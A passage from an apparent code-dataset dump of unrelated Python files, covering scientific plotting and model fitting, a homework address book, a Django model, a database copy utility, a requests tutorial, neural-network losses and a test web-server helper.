open(pathToCalData,'r').read().split('\\n')[1:]\n\twavelength = []\n\tresponse = []\n\tuncert = []\n\tfor line in calData:\n\t\ttempLine = line.split(',')\n\t\twavelength.append(float(tempLine[0]))\n\t\tresponse.append(float(tempLine[1]))\n\t\tuncert.append(float(tempLine[3]))\n\n\twaveOut = np.array(wavelength)\n\tvalOut = np.array(response)\n\tux = np.zeros_like(waveOut)\n\tuy = np.array(uncert)/100.0/2.0*response\n\t\n\treturn waveOut,valOut,ux,uy\n\npathToCalData = './NIST_photodiode_calibration.csv'\ncurrentCalDataSet = extractDataFromFile(pathToCalData)\nplotOut = ROOT.TGraphErrors(len(currentCalDataSet[0]),currentCalDataSet[0],currentCalDataSet[1],currentCalDataSet[2],currentCalDataSet[3])\n\n# Set the graph parameters\nplotOut.GetXaxis().SetTitle(\"Wavelength [nm]\")\nplotOut.GetYaxis().SetTitle(\"Absolute Responsivity [A/W]\")\nplotOut.GetYaxis().SetTitleOffset(1.25)\nplotOut.SetTitle(\"\")\nplotOut.GetXaxis().SetRangeUser(0.0,700.)\nplotOut.SetLineStyle(1)\n\n# C1 = RPL.ASimpleCanvas(\"PhotoDiodeCalibration\")\n# plotOut.Draw(\"ALP\")\n# \n# C1.SaveAs(\"./photoDiodeCalibration.png\")\n\n'''\nPlot the old calibrations together\n'''\npathToOldCalData = '/Users/chrisbenson/Documents/Research/VUV/Data/analysis2/depend/oldCalibration/NIST_Cals/'\ndata_2008 = extractDataFromFile(pathToOldCalData+'NIST_photodiode_calibration_2008.csv')\n\nplot2008 = ROOT.TGraphErrors(len(data_2008[0]),data_2008[0],data_2008[1],data_2008[2],data_2008[3])\nplot2008.SetLineColor(1)\nplot2008.GetXaxis().SetTitle(\"Wavelength [nm]\")\nplot2008.GetYaxis().SetTitle(\"Absolute Responsivity [A/W]\")\n\ndata_2014 = extractDataFromFile(pathToOldCalData+'2014_NIST_photodiode_calibration.csv')\nplot2014 = ROOT.TGraphErrors(len(data_2014[0]),data_2014[0],data_2014[1],data_2014[2],data_2014[3])\nplot2014.SetLineColor(2)\n\nC2 = RPL.ASimpleCanvas(\"PhotoCalComp\")\nplot2008.Draw(\"ALP\")\nplot2014.Draw(\"AP SAME\")\n\nC2.SaveAs(\"./photoDiodeCalibrationComp.png\")\n\n\n","sub_path":"finalPlots/PDcalibrationPlot.py","file_name":"PDcalibrationPlot.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"374799492","text":"from collections import UserDict\nimport re\nfrom datetime import datetime\n\n\nclass Field:\n pass\n\n\nclass Phone(Field):\n def __init__(self, phone):\n self.__phone = None\n self.phone = phone\n\n @property\n def phone(self):\n return self.__phone\n\n @phone.setter\n def phone(self, phone: str):\n flag = False\n if phone.startswith('+380') or phone.startswith('380'):\n res = re.search(\n r'(\\+?380(67|68|96|97|98|50|66|95|99|63|73|93|89|94)\\d{7})', phone)\n if res:\n flag = True\n self.__phone = res.group()\n elif phone.startswith('0'):\n res = re.search(\n r'(0(67|68|96|97|98|50|66|95|99|63|73|93|89|94)\\d{7})', phone)\n if res:\n flag = True\n self.__phone = res.group()\n if not flag:\n print('Incorrect phone!')\n\n def __str__(self):\n return f'{self.__phone}'\n\n\nclass Name(Field):\n def __init__(self, name):\n self.__name = None\n self.name = name\n\n @property\n def name(self):\n return self.__name\n\n @name.setter\n def name(self, name: str):\n if name.isalpha():\n self.__name = name\n else:\n print('Incorrect name!')\n\n def __str__(self):\n return f'{self.__name}'\n\n\nclass Birthday(Field):\n def __init__(self, birthday):\n self.__birthday = None\n self.birthday = birthday\n\n @property\n def birthday(self):\n return self.__birthday\n\n @birthday.setter\n def birthday(self, birthday):\n flag = False\n date = birthday.split('.')\n if len(date) == 3:\n if int(date[0]) <= 31 and int(date[1]) <= 12:\n res = re.search(r'\\d{1,2}\\.\\d{1,2}\\.\\d{4}', birthday)\n if res:\n birthday_formatted = datetime.strptime(\n res.group(), '%d.%m.%Y')\n flag = True\n self.__birthday = birthday_formatted\n if not flag:\n print('Incorrect date or format!\\nTry to enter like the example: 14.06.2002')\n\n def __str__(self):\n if self.__birthday:\n return f'{self.__birthday.date()}'\n return 'None'\n\n def __repr__(self):\n if self.__birthday:\n return f'{self.__birthday.date()}'\n return 'None'\n\n\nclass Record:\n def __init__(self, name, phone, birthday):\n self.name = Name(name)\n self.phone = Phone(phone)\n if birthday:\n self.birthday = Birthday(birthday).__str__()\n else:\n self.birthday = birthday\n\n def days_to_birthday(self):\n if self.birthday != 'None' and self.birthday:\n date_now = datetime.now()\n birth_date = datetime.strptime(self.birthday, '%Y-%m-%d')\n birth_date = birth_date.replace(year=date_now.year)\n if (birth_date - date_now).days < 0:\n birth_date = birth_date.replace(year=birth_date.year + 1)\n return (birth_date - date_now).days\n return -(date_now - birth_date).days\n\n def __str__(self):\n if self.birthday != 'None' and self.birthday:\n return f'{self.name},{self.phone},{Record.days_to_birthday(self)} days left to the birthday'\n return f'{self.name},{self.phone}'\n\n\nclass AddressBook(UserDict):\n def add_record(self, rec):\n self.data[rec.name.__str__()] = rec.__str__()\n if 'None' in self.data.keys():\n self.data.pop('None')\n\n def change_phone(self, rec):\n self.data[rec.name.__str__()] = rec.__str__()\n\n def find_phone(self, name):\n if name in self.data.keys():\n value = self.data[name]\n res = re.search(r'\\+?\\d+', value)\n return res.group()\n return 'Does not exist in database!'\n\n\ndef main():\n main_address_book = AddressBook()\n while True:\n command = input('Command: ').lower()\n sep_val = command.split(' ')\n if sep_val[0] == 'add' and len(sep_val) > 2:\n main_address_book.add_record(\n Record(sep_val[1].title(), sep_val[2], sep_val[3] if len(sep_val) == 4 else None))\n elif sep_val[0] == 'change' and len(sep_val) > 2:\n main_address_book.change_phone(\n Record(sep_val[1].title(), sep_val[2], sep_val[3] if len(sep_val) == 4 else None))\n elif sep_val[0] == 'phone':\n print(main_address_book.find_phone(sep_val[1].title()))\n elif sep_val[0] == 'show' and sep_val[1] == 'all':\n print(main_address_book)\n elif sep_val[0] in ['good bye', \"close\", \"exit\", '.']:\n print('Good bye!')\n break\n elif sep_val[0] == 'hello':\n print('How can I help you?')\n else:\n print('Incorrect! Try again')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"module_11/homework_11.py","file_name":"homework_11.py","file_ext":"py","file_size_in_byte":4877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"127237030","text":"from django.core.validators import MaxValueValidator, MinValueValidator\nfrom django.db import models\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom edc.audit.audit_trail import AuditTrail\n\nfrom ..choices import MOBILITY, SELF_CARE, ACTIVITIES, PAIN, ANXIETY\n\nfrom .base_scheduled_visit_model import BaseScheduledVisitModel\n\n\nclass QualityOfLife (BaseScheduledVisitModel):\n\n \"\"\"CE001\"\"\"\n\n mobility = models.CharField(\n verbose_name=_(\"Mobility\"),\n max_length=45,\n choices=MOBILITY,\n help_text=\"\",\n )\n self_care = models.CharField(\n verbose_name=_(\"Self-Care\"),\n max_length=65,\n choices=SELF_CARE,\n help_text=\"\",\n )\n activities = models.CharField(\n verbose_name=_(\"Usual Activities (e.g. work, study, housework, family or leisure activities)\"),\n max_length=50,\n choices=ACTIVITIES,\n help_text=\"\",\n )\n pain = models.CharField(\n verbose_name=_(\"Pain / Discomfort \"),\n max_length=35,\n choices=PAIN,\n help_text=\"\",\n )\n anxiety = models.CharField(\n verbose_name=_(\"Anxiety / Depression \"),\n max_length=40,\n choices=ANXIETY,\n help_text=\"\",\n )\n health_today = models.IntegerField(\n verbose_name=_(\"We would like to know how good or bad your health is TODAY. \"\n \"This scale is numbered from 0 to 100. 100 means the 'best' health\"\n \" you can imagine. 0 means the 'worst' health you can imagine. \"\n \"Indicate on the scale how your health is TODAY. \"),\n max_length=3,\n validators=[MinValueValidator(0), MaxValueValidator(100)],\n null=True,\n blank=True,\n help_text=(\"Note:Interviewer, please record corresponding number in the boxes.\"\n \" If participant does not want to answer, leave blank\"),\n )\n\n history = AuditTrail()\n\n class Meta:\n app_label = 'bcpp_subject'\n verbose_name = \"Quality of Life\"\n verbose_name_plural = \"Quality of Life\"\n","sub_path":"apps/bcpp_subject/models/quality_of_life.py","file_name":"quality_of_life.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"647645402","text":"\"\"\"Utilities for copying data from a source database to a new DB server.\n\nOperators should use this code via the command:\n\n ./run.py copydb\n\nConnection and Crossover classes are from `sqlacrossover\n`_, Copyright 2015\nAndrew Grigorev. Apache license. See licenses/sqlacrossover.txt.\n\"\"\"\n\nimport logging\nimport sqlalchemy as sa\n\nlogger = logging.getLogger(__name__)\n\n\nclass Connection():\n def __init__(self, url):\n self.engine = sa.create_engine(url)\n self.conn = self.engine.connect()\n self.meta = sa.MetaData()\n self.meta.reflect(self.engine)\n\n tables = sa.schema.sort_tables(self.meta.tables.values())\n self.tables = [i.name for i in tables]\n\n\nclass Crossover():\n\n def __init__(self, source, target, bulk):\n self.source = Connection(source)\n self.target = Connection(target)\n self.bulk = bulk\n\n self.insert_data = self.insert_data_simple\n\n def copy_data_in_transaction(self):\n with self.target.conn.begin():\n self.copy_data()\n\n def copy_data(self):\n if set(self.source.tables) != set(self.target.tables):\n logger.warning(\"Source and target database table lists are not \"\n \"identical!\")\n for table in self.source.tables:\n if table in self.target.tables:\n self.copy_table(table)\n\n def copy_table(self, table):\n offset = 0\n source_table = self.target.meta.tables[table]\n while True:\n data = list(self.source.conn.execute(\n sa.select([source_table]).offset(offset).limit(self.bulk)\n ))\n if not data:\n break\n self.insert_data(table, data)\n offset += self.bulk\n\n def insert_data_simple(self, table, data):\n self.target.conn.execute(self.target.meta.tables[table].insert(), data)\n","sub_path":"app/dbcopy.py","file_name":"dbcopy.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"233438311","text":"#coding = utf -8\r\n__author__ = 'Aimee'\r\n\r\n#params ,headers, data,json,files\r\nimport requests\r\nimport json\r\n\r\nhost = 'https://httpbin.org/'\r\nendpoint = 'post'\r\nurl = ''.join([host,endpoint])\r\nparams = {'show_env' :1}\r\n\r\n#对应postman body中的form-data形式\r\n# data = {'a':\"aimee\",'b':'学测试'}\r\n#\r\n# r = requests.post(url,params=params,data=data)\r\n# print(r.text)\r\n#\r\n# res = r.json()\r\n# print(res['form'])\r\n\r\n\r\n#json 对应postman中 body中 raw格式将json格式复制进去\r\n\r\n# data = {\r\n# \"employees\": [\r\n# { \"firstName\":\"Bill\" , \"lastName\":\"Gates\" },\r\n# { \"firstName\":\"George\" , \"lastName\":\"Bush\" },\r\n# { \"firstName\":\"Thomas\" , \"lastName\":\"Carter\" }\r\n# ]\r\n# }\r\n\r\n# r = requests.post(url,data=data) #直接传无效\r\n# print(r.text)\r\n\r\n# r = requests.post(url,data=json.dumps(data)) #低版本\r\n# r = requests.post(url,json=data) #request模块高版本支持json关键字参数\r\n# print(r.text)\r\n# response =r.json()\r\n# print(response['json'])\r\n\r\n\r\n#files\r\n#1.普通上传文件\r\n# files = {'files':open('test.txt','rb')}\r\n#2、通过文件上传字符串\r\n# files = {'files':('test.txt','aimee is a tester')}\r\n#3、自定义文件名、文件类型以及请求头(请求文件名称、文件路径、文件类型、文件请求头)\r\n# files = {'files':open('江湖.jpg','rb')}\r\n# files = {'files':('江湖.jpg',open('江湖.jpg','rb'),'image/png')}\r\n\r\n#4、传送多个文件\r\n# files = [\r\n# ('field1',('test.txt',open('test.txt','rb'))),\r\n# ('field2',('江湖.jpg',open('江湖.jpg','rb'),'image/png'))\r\n#\r\n# ]\r\n\r\n#5、流式上传\r\nwith open('test.txt') as f:\r\n r = requests.post(url,data=f)\r\n\r\n# r = requests.post(url,files=files)\r\nprint(r.headers)\r\nprint(r.text)\r\n\r\n\r\n","sub_path":"第一期/广州-Aimee/interface/test_case/post.py","file_name":"post.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"269591941","text":"'''\nCreated on Apr 27, 2018\n\n@author: thay838\n\nOriginal R code written by Dave Engel. R code adapted to Python by Bin Zheng.\nFinal adoption into application by Brandon Thayer.\n\nNotes from Dave:\nAugmented Lagrangian Adaptive Barrier Minimization\n'''\nimport numpy as np\nimport math\nimport mystic.solvers as my\nfrom scipy.optimize import minimize\n\n# Constant for ZIP coefficients. ORDER MATTERS!\nZIPTerms = ['impedance', 'current', 'power']\n\n# List of available solvers for zipFit\nSOLVERS = ['fmin_powell', 'SLSQP']\n\n# Constants for convergence tolerance\nFTOL = 1e-8\nGTOL = 5 # Number of iterations without change for fmin_powell\n\ndef zipFit(V, P, Q, Vn=240.0, solver='fmin_powell'):\n \"\"\"Solve for ZIP coefficients usable by GridLAB-D.\n \n V: voltage magnitude array\n P: real power array\n Q: reactive power array\n Vn: nominal voltage\n solver: either 'fmin_powell' to use mystic's modified scipy fmin_powell \n solver, or 'SLSQP' to use scipy's sequential least squares programming\n solver.\n \"\"\"\n # Estimate nominal power\n Sn = estimateNominalPower(P=P, Q=Q)\n \n # Massage into standard polynomial format\n Vbar = V/Vn\n Pbar = P/Sn\n Qbar = Q/Sn\n \n # Initial parameters for ZIP model\n # TODO: initialize from previously computed coefficients to start.\n # Why are we multiply by 1/18?\n par0 = np.ones(6)*(1/18)\n \n # Solve.\n if solver == 'fmin_powell':\n sol = my.fmin_powell(Object, args=(Vbar, Pbar, Qbar), x0=par0,\n contraint=Constrain, disp=False, gtol=GTOL,\n ftol=FTOL, full_output=True)\n # Extract the polynomial coefficients\n p = sol[0][0:3]\n q = sol[0][3:6]\n \n # Get the value of the objective function (so the squared error)\n err = sol[1]\n \n elif solver == 'SLSQP':\n sol = minimize(Object, par0, args=(Vbar, Pbar, Qbar), method='SLSQP',\n constraints={'type':'eq', 'fun': Constrain},\n bounds=None, options={'ftol': FTOL})\n \n # Extract the polynomial coefficients\n p = sol.x[0:3]\n q = sol.x[3:6]\n \n # Get the value of the objective function (so the squared error)\n err = sol.fun\n else:\n raise UserWarning('Given solver, {}, is not implemented.'.format(solver))\n \n # Some code Bin had in?\n #cons2 = {'type':'eq', 'fun': Constrain2}\n #cons3 = {'type':'eq', 'fun': Constrain3}\n \"\"\"\n if abs(Constrain(opti.x))>0.75:\n opti = minimize(Object, par0, args=(V1bar, P1bar, Q1bar), method='SLSQP', constraints = cons2, bounds = None)\n \n if abs(Constrain(opti.x))>2.0:\n opti = minimize(Object, par0, args=(V1bar, P1bar, Q1bar), method='SLSQP', constraints = cons3, bounds = None)\n \"\"\"\n \n # Convert the polynomial coefficients to GridLAB-D format (fractions and\n # power factors)\n coeff = polyToGLD(p, q)\n \n # Collect other useful information\n coeff['base_power'] = Sn\n coeff['error'] = err\n coeff['poly'] = (*p, *q)\n \n return coeff\n\ndef estimateNominalPower(P, Q):\n \"\"\"Given a set of apparent power measurements, estimate nominal power.\n \n For now, we'll simply use the median of the apparent power.\n \"\"\"\n Sn = np.median(np.sqrt(np.multiply(P,P) + np.multiply(Q,Q)))\n return Sn\n\ndef Object(Params, Vbar, Pbar, Qbar):\n \"\"\"Objective function for minimization. Minimize squared error.\"\"\"\n a1, a2, a3, b1, b2, b3 = Params\n return sum( (Pbar - (a1*(Vbar*Vbar)+a2*Vbar+a3))**2\n + (Qbar - (b1*(Vbar*Vbar)+b2*Vbar+b3))**2 )/len(Vbar)\n \ndef Constrain(Params):\n \"\"\"Constraint for ZIP modeling - \"\"\"\n a1, a2, a3, b1, b2, b3 = Params\n return math.sqrt(a1*a1 + b1*b1) + math.sqrt(a2*a2 + b2*b2) + math.sqrt(a3*a3 + b3*b3) - 1.0\n\n# These functions aren't currently being used.\n'''\ndef Constrain2(Params):\n a1, a2, a3, b1, b2, b3 = Params\n return math.sqrt(a1*a1 + b1*b1) + math.sqrt(a2*a2 + b2*b2) + math.sqrt(a3*a3 + b3*b3) - 2.0\n\ndef Constrain3(Params):\n a1, a2, a3, b1, b2, b3 = Params\n return math.sqrt(a1*a1 + b1*b1) + math.sqrt(a2*a2 + b2*b2) + math.sqrt(a3*a3 + b3*b3) - 3.0\n'''\n\n\ndef polyToGLD(p, q):\n \"\"\"Takes polynomial ZIP coefficients and converts them to GridLAB-D format.\n \n GridLAB-D takes in ZIP fractions and 'power factors' (cosine of the angle).\n Additionally, a negative power factor is used for leading, and a positive\n power factor is used for lagging. Essentially, a negative PF is a signal\n to flip the imaginary component of apparent power.\n \n NOTE: we're counting on coefficients to come in in 'a, b, c' order, AKA\n impedance, current, power.\n \n So:\n p = (a1, a2, a3)\n q = (b1, b2, b3)\n a1 = Z%cos(thetaZ), b1 = Z%sin(thetaZ)\n a2 = I%cos(thetaI), b2 = I%sin(thetaI)\n a3 = P%cos(thetaP), b4 = P%sin(thetaP)\n \"\"\"\n # Initialize return\n out = {}\n \n # Track index. Note we're \n i = 0\n for k in ZIPTerms:\n # Initialize the fraction. Note that this reduces correctly, but loses\n # sign information:\n # a1 = Z%*cos(thetaZ), b1 = Z%*sin(thetaZ) and so on.\n fraction = math.sqrt(p[i]*p[i]+q[i]*q[i])\n \n # Derive the power-factor:\n try:\n pf = abs(p[i]/fraction)\n except ZeroDivisionError:\n # If we divided by zero, simply make the power factor 1\n pf = 1\n \n # match what is done in Gridlab-D\n if p[i] > 0 and q[i] < 0:\n # Leading power factor\n pf *= -1\n elif p[i] < 0 and q[i] < 0:\n # Negative load, flip the fraction\n fraction *= -1\n elif p[i] < 0 and q[i] > 0:\n # Negative load and leading power factor, flip both.\n pf *= -1\n fraction *= -1\n \n # Assign to return.\n out[k + '_fraction'] = fraction\n out[k + '_pf'] = pf\n \n # Increment index counter\n i += 1\n \n return out\n \ndef gldZIP(V, coeff, Vn):\n \"\"\"Computes P and Q from ZIP coefficients and voltage as GridLAB-D does.\n \n This is not meant to be optimal/efficient, but rather a rewrite of how\n GridLAB-D performs it for testing purposes.\n \n Check out the 'triplex_load_update_fxn()' in:\n https://github.com/gridlab-d/gridlab-d/blob/master/powerflow/triplex_load.cpp\n \"\"\"\n d = {}\n for k in ZIPTerms:\n real = coeff['base_power']*coeff[k+'_fraction']*abs(coeff[k+'_pf'])\n imag = real * math.sqrt(1/coeff[k+'_pf']**2 - 1)\n \n if coeff[k +'_pf'] < 0:\n imag *= -1\n \n d[k] = (real, imag)\n \n # Compute P and Q\n P = (\n (V**2/Vn**2) * d['impedance'][0]\n + (V/Vn) * d['current'][0]\n + d['power'][0]\n )\n \n Q = (\n (V**2/Vn**2) * d['impedance'][1]\n + (V/Vn) * d['current'][1]\n + d['power'][0]\n )\n \n return P, Q\n\nif __name__ == '__main__':\n # Get voltage array\n V = np.arange(0.95*240, 1.05*240)\n Vn = 240\n #**************************************************************************\n # Constant current\n I = 1+1j\n S = V * np.conjugate(I)\n P_constI = np.real(S)\n Q_constI = np.imag(S)\n m = zipFit(V, P_constI, Q_constI, solver='fmin_powell')\n P_M, Q_M = gldZIP(V, m, Vn)\n s = zipFit(V, P_constI, Q_constI, solver='SLSQP')\n P_S, Q_S = gldZIP(V, s, Vn)\n print('Finished constant current test.')\n #**************************************************************************\n # Constant impedance\n Z = 1+1j\n I = V / Z\n S = V * np.conjugate(I)\n P_constI = np.real(S)\n Q_constI = np.imag(S)\n m = zipFit(V, P_constI, Q_constI, solver='fmin_powell')\n P_M, Q_M = gldZIP(V, m, Vn)\n s = zipFit(V, P_constI, Q_constI, solver='SLSQP')\n P_S, Q_S = gldZIP(V, s, Vn)\n print('Finished constant impedance test.')\n #**************************************************************************\n # Constant power\n S = np.ones_like(V) * 1+1j\n P_constI = np.real(S)\n Q_constI = np.imag(S)\n m = zipFit(V, P_constI, Q_constI, solver='fmin_powell')\n P_M, Q_M = gldZIP(V, m, Vn)\n s = zipFit(V, P_constI, Q_constI, solver='SLSQP')\n P_S, Q_S = gldZIP(V, s, Vn)\n print('Finished constant power test.')\n #**************************************************************************\n # Mixture\n # Constant impedance:\n Z = 1+1j\n I_z = V /Z\n S_z = V * np.conjugate(I_z)\n # Constant current:\n I = 1+1j\n S_i = V * np.conjugate(I)\n # Constant power.\n S_p = np.ones_like(V) * 1+1j\n # Combine\n S_tot = S_z + S_i + S_p\n P_tot = np.real(S_tot)\n Q_tot = np.imag(S_tot)\n m = zipFit(V, P_tot, Q_tot, solver='fmin_powell')\n P_M, Q_M = gldZIP(V, m, Vn)\n s = zipFit(V, P_tot, Q_tot, solver='SLSQP')\n P_S, Q_S = gldZIP(V, s, Vn)\n print('Finished constant impedance test.')\n \n # TODO","sub_path":"pyvvo/app/zipModel.py","file_name":"zipModel.py","file_ext":"py","file_size_in_byte":9050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"193023442","text":"import os\nfrom bifrost_extractor import BifrostExtractor\n\nif not os.path.exists('out'):\n os.makedirs('out')\n\nbe = BifrostExtractor('en024031_emer3.0med', 438, fdir='/mn/stornext/d7/larsfrog/en024031_emer3.0med',\n precentered=1, folder='out', save='full', fromfolder=0, verbose=1)\n\npositions = be.get_start_positions(n_positions=80, z_lims=(-14.0, -3.0), e=(6, 6, 6))\nbe.extract_fieldlines(positions, L=15, direction='forward', z_decoupling=('>', -0.1), z_termination=('>', 0.3))\nbe.extract_fieldlines(positions, L=15, direction='backward', z_decoupling=('>', -0.1), z_termination=('>', 0.3))\n\nbe.generate_multi_atmos_file('A1', 10, 300, vturb_val=2.0, use_vl=False, force=False, reverse_grav=True)\nbe.generate_multi_atmos_file('A2', 54, 300, vturb_val=2.0, use_vl=False, force=False, reverse_grav=True)\nbe.generate_multi_atmos_file('A3', 48, 300, vturb_val=2.0, use_vl=False, force=False, reverse_grav=True)\n\nbe.fieldlines.plot_fieldline_profiles(marker='-', n_linepoints=400, numbers=0, savename='init_height_profiles.eps', line_nums=[10, 54, 48], linewidth=1, fontsize=8, showlabels=1, labels=['A1', 'A2', 'A3'])\nbe.fieldlines.plot_quantities('tg', marker='-', ylog=True, savename='init_temperatures.eps', line_nums=[10, 54, 48], linewidth=2, fontsize=13, showlabels=1, labels=['A1', 'A2', 'A3'], quantity_des=r'$T_g$ [K]')\nbe.fieldlines.plot_quantities('r', marker='-', ylog=True, savename='init_densities.eps', line_nums=[10, 54, 48], linewidth=2, fontsize=13, showlabels=1, labels=['A1', 'A2', 'A3'], quantity_des=r'$\\rho$ [g$/$cm$^3$]')\n","sub_path":"src/get_atmospheres.py","file_name":"get_atmospheres.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"7995878","text":"import numpy as np\n\nfrom ldgsim import utility as u\nfrom ldgsim import param as p\nfrom ldgsim import mesh as m\n\n\"\"\" grid selectors \"\"\"\n\ndef is_top(grid):\n\tif grid.r[2] == p.axis_z[0]:\n\t\treturn True\n\treturn False\n\ndef is_bot(grid):\n\tif grid.r[2] == p.axis_z[-1]:\n\t\treturn True\n\treturn False\n\ndef is_osh(grid, thickness=p.dx, radius=p.r_nog):\n\td = np.linalg.norm(grid.r)\n\tif (d >= radius and abs(d - radius) < thickness):\n\t\treturn True\n\treturn False\n\ndef is_ish(grid, thickness=p.dx, radius=p.r_nog):\n\td = np.linalg.norm(grid.r)\n\tif (d < radius and abs(d - radius) < thickness):\n\t\treturn True\n\treturn False\n\n\n\"\"\" apply the boundary conditions and initial conditions \"\"\"\n\ndef envelope(grid, trend=p.n_shel):\n\t''' calculate the orientation around the sphere under a special arrangement '''\n\tN = u.cartesian(trend)\n\tr = u.cartesian(grid.r)\n\treturn N - np.dot(N, r) * r\n\ndef rotate(grid, alignment=p.n_subs, trend=p.n_shel, bias=p.n_bias):\n\t''' grid-based molecule orientation rotator '''\n\tif is_top(grid) or is_bot(grid):\n\t\tgrid.n = np.array(alignment)\n\telif is_osh(grid):\n\t\tgrid.n = envelope(grid, trend)\n\telif is_ish(grid):\n\t\tgrid.n = envelope(grid, trend - u.cartesian(bias))\n\telse:\n\t\tgrid.n = np.array(alignment)\t# bulk initial condition\nRotate = np.vectorize(rotate)\n\ndef reorder(grid, S_subs=p.S_subs, S_cent=p.S_cent, S_init=p.S_init):\n\t''' reassign the degree of order of liquid crystal molecule '''\n\tif is_top(grid) or is_bot(grid):\n\t\tgrid.S = S_subs\n\telif is_ish(grid):\n\t\tgrid.S = S_cent\n\telse:\n\t\tgrid.S = S_init\nReorder = np.vectorize(reorder)","sub_path":"ldgsim/cond.py","file_name":"cond.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"352921091","text":"import tensorflow as tf\nimport tensorflow.keras as tfk\n\nfrom squeezedet.utils import iou\n\n\nclass ClassLoss(tfk.losses.Loss):\n def __init__(self, epsilon=1e-16):\n super(ClassLoss, self).__init__(\n reduction=tfk.losses.Reduction.SUM)\n self.epsilon = epsilon\n\n def call(self, y_true, y_pred):\n num_objects = tf.math.count_nonzero(\n y_pred._keras_mask, dtype=tf.float32)\n\n diff = tf.math.reduce_sum(\n y_true * (-tf.math.log(y_pred + self.epsilon)) +\n (1 - y_true) * (-tf.math.log(1 - y_pred + self.epsilon)), axis=-1)\n\n diff = tf.nn.softmax_cross_entropy_with_logits(y_true, y_pred)\n\n return diff / num_objects\n\n\nclass ConfidenceLoss(tfk.losses.Loss):\n def __init__(self, epsilon=1e-16):\n super(ConfidenceLoss, self).__init__(\n reduction=tfk.losses.Reduction.SUM)\n self.epsilon = epsilon\n\n def call(self, y_true, y_pred):\n num_objects = tf.math.count_nonzero(\n y_pred._keras_mask, dtype=tf.float32)\n\n confidence, bboxes = tf.split(y_pred, [1, 4], axis=-1)\n\n ious = iou(y_true, bboxes, epsilon=self.epsilon)\n diff = tf.math.square(ious - tf.squeeze(confidence, -1)) / 20\n\n return diff / num_objects\n\n\nclass BboxLoss(tfk.losses.Loss):\n def __init__(self):\n super(BboxLoss, self).__init__(\n reduction=tfk.losses.Reduction.SUM)\n\n def call(self, y_true, y_pred):\n num_objects = tf.math.count_nonzero(\n y_pred._keras_mask, dtype=tf.float32)\n\n diff = tf.math.reduce_sum(tf.math.square(y_true - y_pred), axis=-1)\n\n return diff / num_objects\n","sub_path":"squeezedet/legacy/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"524263453","text":"import unittest\nimport sys\nimport os\nimport time\nimport threading\nfrom six.moves.socketserver import TCPServer\n\n# There needs to be a file named test_web_server next to this file with a class named TestWebServerHandler that inherits from BaseHTTPServer.BaseHTTPRequestHandler\nfrom test_web_server import TestWebServerHandler\n\nclass UnitTestWithWebServer(unittest.TestCase):\n \"\"\"\n This test class runs a web-server for the purposes of testing with a live web-server.\n \"\"\"\n \n DEFAULT_TEST_WEB_SERVER_PORT = 8888\n warned_about_no_httpd = False\n httpd = None\n \n @classmethod\n def setUpClass(cls):\n \n cls.web_server_port = int(os.environ.get(\"TEST_WEB_SERVER_PORT\", cls.DEFAULT_TEST_WEB_SERVER_PORT))\n \n # Stop if the web-server was already started\n if UnitTestWithWebServer.httpd is not None:\n return\n \n attempts = 0\n \n sys.stdout.write(\"Waiting for web-server to start ...\")\n sys.stdout.flush()\n \n while UnitTestWithWebServer.httpd is None and attempts < 75:\n try:\n UnitTestWithWebServer.httpd = cls.get_server(cls.web_server_port)\n \n print(\" Done\")\n \n except IOError:\n UnitTestWithWebServer.httpd = None\n time.sleep(4)\n attempts = attempts + 1\n sys.stdout.write(\".\")\n sys.stdout.flush()\n \n if UnitTestWithWebServer.httpd is None:\n print(\"Web-server could not be started\")\n return\n \n def start_server(httpd):\n if httpd is not None:\n httpd.serve_forever()\n \n t = threading.Thread(target=start_server, args = (UnitTestWithWebServer.httpd,))\n t.daemon = True\n t.start()\n \n @classmethod\n def shutdownServer(cls):\n if UnitTestWithWebServer.httpd is not None:\n UnitTestWithWebServer.httpd.shutdown()\n UnitTestWithWebServer.httpd = None\n \n def test_if_web_server_is_running(self):\n if UnitTestWithWebServer.httpd is None and not UnitTestWithWebServer.warned_about_no_httpd:\n UnitTestWithWebServer.warned_about_no_httpd = True\n self.fail(\"The test web-server is not running; tests that rely on the built-in web-server will fail or be skipped\")\n \n @classmethod\n def get_server(cls, port):\n \"\"\"\n Call httpd.shutdown() to stop the server\n \"\"\"\n \n httpd = TCPServer((\"\", port), TestWebServerHandler)\n return httpd\n \ndef skipIfNoServer(func):\n def _decorator(self, *args, **kwargs):\n if self.httpd is None:\n # Don't run the test if the server is not running\n self.skipTest(\"The web-server is not running\")\n else:\n return func(self, *args, **kwargs)\n \n return _decorator","sub_path":"tests/unit_test_web_server.py","file_name":"unit_test_web_server.py","file_ext":"py","file_size_in_byte":2954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"389186159","text":"import pandas as pd\nimport math\nfrom scipy.stats import norm\nimport numpy as np\n\ntabulato = pd.read_csv(\"../dati_pre_eventi/data/tabulato_semplificato.csv\")\neventi1 = pd.read_csv(\"creazione_eventi/data/events/events1.csv\")\npartsXY = {}\nfinestra = 43200\n\n\ndef group_e1():\n global eventi1\n eventi1 = eventi1.drop(columns=[\"timestamp2\"])\n eventi1[\"chiamate\"] = eventi1[\"esito_positivo\"] + eventi1[\"esito_negativo\"]\n eventi1 = eventi1.drop(columns=[\"esito_positivo\", \"esito_negativo\"])\n 